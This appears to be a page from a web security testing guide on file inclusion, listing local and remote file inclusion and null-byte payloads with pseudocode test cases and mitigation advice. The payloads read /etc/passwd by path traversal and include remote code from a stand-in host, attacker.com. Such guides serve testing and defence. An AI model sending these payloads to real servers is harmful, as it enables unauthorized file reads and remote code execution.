File Inclusion

Description

File Inclusion occurs when a web application includes files based on user input without proper validation. This can lead to arbitrary file inclusion, allowing attackers to read sensitive files or execute arbitrary code.

Example with Scenario

Scenario: A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.

Payloads and Test Cases

Payloads

Local File Inclusion (LFI):
```
/include?file=../../../../etc/passwd
```

Remote File Inclusion (RFI):

/include?file=http://attacker.com/malicious.php

Null Byte Injection:
```
/include?file=../../../../etc/passwd%00
```

Test Cases

Local File Inclusion (LFI):

Payload:
```
/include?file=../../../../etc/passwd
```

Test Case:

# Send payload to the server
sendPayloadToServer("/include?file=../../../../etc/passwd")
# Verify if the application includes the /etc/passwd file
checkFileInclusion("/etc/passwd")

Remote File Inclusion (RFI):

Payload:

/include?file=http://attacker.com/malicious.php

Test Case:

# Send payload to the server
sendPayloadToServer("/include?file=http://attacker.com/malicious.php")
# Verify if the application includes the remote file
checkRemoteFileInclusion("http://attacker.com/malicious.php")

Null Byte Injection:

Payload:
```
/include?file=../../../../etc/passwd%00
```

Test Case:

# Send payload to the server
sendPayloadToServer("/include?file=../../../../etc/passwd%00")
# Verify if the application includes the /etc/passwd file despite null byte
checkFileInclusion("/etc/passwd")

Mitigation

Input Validation:
- Validate and sanitize user input to ensure it does not contain malicious paths.
- Use allow-lists to restrict input to expected file paths.
Disable Dynamic Inclusion:
- Avoid using dynamic file inclusion based on user input.
- Use static file paths or mapped identifiers for inclusion.
Limit File Access:
- Restrict file access permissions to only necessary files.
- Use chroot or containerization to limit file system exposure.
Error Handling:
- Implement proper error handling to avoid revealing file system structure.
- Return generic error messages without disclosing sensitive information.

PreviousOpen Redirect NextFile Upload

Last updated 10 months ago

# Send payload to the server sendPayloadToServer("/include?file=http://attacker.com/malicious.php") # Verify if the application includes the remote file checkRemoteFileInclusion("http://attacker.com/malicious.php")

# Send payload to the server sendPayloadToServer("/include?file=../../../../etc/passwd%00") # Verify if the application includes the /etc/passwd file despite null byte checkFileInclusion("/etc/passwd")